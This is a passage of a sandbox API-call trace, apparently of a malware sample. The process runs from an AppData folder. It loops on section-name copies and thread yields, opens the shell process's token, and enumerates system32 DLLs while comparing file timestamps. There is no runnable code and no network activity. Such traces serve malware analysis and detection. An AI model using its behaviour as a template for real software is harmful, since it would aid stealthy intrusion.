iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.311] SwitchToThread () returned 0 [0206.311] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.311] SwitchToThread () returned 0 [0206.311] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.311] SwitchToThread () returned 0 [0206.311] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.312] SwitchToThread () returned 0 [0206.312] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.312] SwitchToThread () returned 0 [0206.312] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.312] SwitchToThread () returned 0 [0206.312] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.312] SwitchToThread () returned 0 [0206.312] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.312] SwitchToThread () returned 0 [0206.312] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.312] SwitchToThread () returned 0 [0206.312] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.312] SwitchToThread () returned 0 [0206.312] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.312] SwitchToThread () returned 0 [0206.313] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.313] SwitchToThread () returned 0 [0206.313] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.313] SwitchToThread () returned 0 [0206.313] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.313] SwitchToThread () returned 0 [0206.313] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.313] SwitchToThread () returned 0 [0206.313] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.313] SwitchToThread () returned 0 [0206.313] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.313] SwitchToThread () returned 0 [0206.313] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.313] SwitchToThread () returned 0 [0206.313] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.313] SwitchToThread () returned 0 [0206.313] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.314] SwitchToThread () returned 0 [0206.314] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.314] SwitchToThread () returned 0 [0206.314] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.314] SwitchToThread () returned 0 [0206.314] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.314] SwitchToThread () returned 0 [0206.314] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.314] SwitchToThread () returned 0 [0206.314] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.314] SwitchToThread () returned 0 [0206.314] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.314] SwitchToThread () returned 0 [0206.314] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.314] SwitchToThread () returned 0 [0206.314] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.315] SwitchToThread () returned 0 [0206.315] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.315] SwitchToThread () returned 0 [0206.315] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.315] SwitchToThread () returned 0 [0206.315] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.315] SwitchToThread () returned 0 [0206.315] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.315] SwitchToThread () returned 0 [0206.315] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.315] SwitchToThread () returned 0 [0206.315] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.315] SwitchToThread () returned 0 [0206.315] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.315] SwitchToThread () returned 0 [0206.315] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.316] SwitchToThread () returned 0 [0206.316] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.316] SwitchToThread () returned 0 [0206.316] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.316] SwitchToThread () returned 0 [0206.316] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.316] SwitchToThread () returned 0 [0206.316] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.316] SwitchToThread () returned 0 [0206.316] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.316] SwitchToThread () returned 0 [0206.316] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.316] SwitchToThread () returned 0 [0206.316] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.316] SwitchToThread () returned 0 [0206.316] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.317] SwitchToThread () returned 0 [0206.317] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.317] SwitchToThread () returned 0 [0206.317] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.317] SwitchToThread () returned 0 [0206.317] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.317] SwitchToThread () returned 0 [0206.317] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.317] SwitchToThread () returned 0 [0206.317] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.317] SwitchToThread () returned 0 [0206.317] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.317] SwitchToThread () returned 0 [0206.317] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.317] SwitchToThread () returned 0 [0206.317] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.318] SwitchToThread () returned 0 [0206.318] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.318] SwitchToThread () returned 0 [0206.318] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.318] SwitchToThread () returned 0 [0206.318] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.318] SwitchToThread () returned 0 [0206.318] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.318] SwitchToThread () returned 0 [0206.318] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.318] SwitchToThread () returned 0 [0206.318] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.318] SwitchToThread () returned 0 [0206.318] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.318] SwitchToThread () returned 0 [0206.318] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.319] SwitchToThread () returned 0 [0206.319] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.319] SwitchToThread () returned 0 [0206.319] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.319] SwitchToThread () returned 0 [0206.319] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.319] SwitchToThread () returned 0 [0206.319] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.319] SwitchToThread () returned 0 [0206.319] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.319] SwitchToThread () returned 0 [0206.319] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.319] SwitchToThread () returned 0 [0206.319] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.319] SwitchToThread () returned 0 [0206.319] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.320] SwitchToThread () returned 0 [0206.320] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.320] SwitchToThread () returned 0 [0206.320] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.320] SwitchToThread () returned 0 [0206.320] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.320] SwitchToThread () returned 0 [0206.320] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.320] SwitchToThread () returned 0 [0206.320] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.320] SwitchToThread () returned 0 [0206.320] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.320] SwitchToThread () returned 0 [0206.320] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.320] SwitchToThread () returned 0 [0206.320] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.320] SwitchToThread () returned 0 [0206.321] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.321] SwitchToThread () returned 0 [0206.321] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.321] SwitchToThread () returned 0 [0206.321] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.321] SwitchToThread () returned 0 [0206.321] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.321] SwitchToThread () returned 0 [0206.321] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.321] SwitchToThread () returned 0 [0206.321] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.321] SwitchToThread () returned 0 [0206.321] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.321] SwitchToThread () returned 0 [0206.321] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.321] SwitchToThread () returned 0 [0206.322] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.322] SwitchToThread () returned 0 [0206.322] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.322] SwitchToThread () returned 0 [0206.322] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.322] SwitchToThread () returned 0 [0206.322] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.322] SwitchToThread () returned 0 [0206.322] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.322] SwitchToThread () returned 0 [0206.322] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.322] SwitchToThread () returned 0 [0206.322] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.322] SwitchToThread () returned 0 [0206.322] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.322] SwitchToThread () returned 0 [0206.323] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.323] SwitchToThread () returned 0 [0206.323] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.323] SwitchToThread () returned 0 [0206.323] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.323] SwitchToThread () returned 0 [0206.323] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.323] SwitchToThread () returned 0 [0206.323] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.323] SwitchToThread () returned 0 [0206.323] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.323] SwitchToThread () returned 0 [0206.323] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.323] SwitchToThread () returned 0 [0206.323] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.323] SwitchToThread () returned 0 [0206.324] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.324] SwitchToThread () returned 0 [0206.324] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.324] SwitchToThread () returned 0 [0206.324] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.324] SwitchToThread () returned 0 [0206.324] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.324] SwitchToThread () returned 0 [0206.324] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.324] SwitchToThread () returned 0 [0206.324] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.324] SwitchToThread () returned 0 [0206.324] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.324] SwitchToThread () returned 0 [0206.324] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.324] SwitchToThread () returned 0 [0206.324] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.325] SwitchToThread () returned 0 [0206.325] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.325] SwitchToThread () returned 0 [0206.325] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.325] SwitchToThread () returned 0 [0206.325] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.325] SwitchToThread () returned 0 [0206.325] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.325] SwitchToThread () returned 0 [0206.325] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.325] SwitchToThread () returned 0 [0206.325] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.325] SwitchToThread () returned 0 [0206.325] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.326] SwitchToThread () returned 0 [0206.326] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.326] SwitchToThread () returned 0 [0206.326] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.326] SwitchToThread () returned 0 [0206.326] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.326] SwitchToThread () returned 0 [0206.326] lstrcpynA (in: lpString1=0x1eafecc, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0206.559] GetVersion () returned 0x23f00206 [0206.559] GetCurrentProcessId () returned 0x51c [0206.559] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xc4 [0206.559] GetLongPathNameW (in: lpszShortPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpszLongPath=0x0, cchBuffer=0x0 | out: lpszLongPath=0x0) returned 0x3b [0206.560] GetLongPathNameW (in: lpszShortPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpszLongPath=0x23c87b8, cchBuffer=0x3b | out: lpszLongPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 0x3a [0206.561] GetProcAddress (hModule=0x74d70000, lpProcName="IsWow64Process") returned 0x74d896e0 [0206.561] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x1eafee8 | out: Wow64Process=0x1eafee8) returned 1 [0206.561] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x766f0000 [0206.561] GetProcAddress (hModule=0x766f0000, lpProcName="GetWindowThreadProcessId") returned 0x7670ba70 [0206.561] FindWindowA (lpClassName="ProgMan", lpWindowName=0x0) returned 0x100dc [0206.561] GetWindowThreadProcessId (in: hWnd=0x100dc, lpdwProcessId=0x1eafeec | out: lpdwProcessId=0x1eafeec) returned 0x838 [0206.562] NtOpenProcess (in: ProcessHandle=0x1eafee0, DesiredAccess=0x400, ObjectAttributes=0x1eafec0*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x1eafed8*(UniqueProcess=0x834, UniqueThread=0x0) | out: ProcessHandle=0x1eafee0*=0x178) returned 0x0 [0206.562] NtOpenProcessToken (in: ProcessHandle=0x178, DesiredAccess=0x8, TokenHandle=0x1eafee4 | out: TokenHandle=0x1eafee4*=0x180) returned 0x0 [0206.562] NtQueryInformationToken (in: TokenHandle=0x180, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1eafef0 | out: TokenInformation=0x0, ReturnLength=0x1eafef0) returned 0xc0000023 [0206.562] NtQueryInformationToken (in: TokenHandle=0x180, TokenInformationClass=0x1, TokenInformation=0x23c85a8, TokenInformationLength=0x24, ReturnLength=0x1eafef0 | out: TokenInformation=0x23c85a8, ReturnLength=0x1eafef0) returned 0x0 [0206.562] NtClose (Handle=0x180) returned 0x0 [0206.562] NtClose (Handle=0x178) returned 0x0 [0206.562] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x20 [0206.562] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x23c86d0, nSize=0x20 | out: lpDst="C:\\Windows\\system32\\c_1252.nls") returned 0x1f [0206.562] CreateFileA (lpFileName="C:\\Windows\\system32\\c_1252.nls" (normalized: "c:\\windows\\system32\\c_1252.nls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0206.563] GetFileTime (in: hFile=0x178, lpCreationTime=0x1eafeac, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x1eafeac*(dwLowDateTime=0x9656d311, dwHighDateTime=0x1d0baff), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0206.563] CloseHandle (hObject=0x178) returned 1 [0206.563] StrRChrA (lpStart="C:\\Windows\\system32\\c_1252.nls", lpEnd=0x0, wMatch=0x5c) returned="\\c_1252.nls" [0206.563] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\*.dll" | out: lpString1="C:\\Windows\\system32\\*.dll") returned="C:\\Windows\\system32\\*.dll" [0206.563] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\*.dll", lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 0x59e830 [0206.563] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.563] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.563] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.563] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.563] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.563] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.563] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.563] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.563] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.563] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.563] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.563] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.563] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.563] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.563] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.563] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.563] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.563] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.563] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.563] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.563] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.563] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.564] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.564] 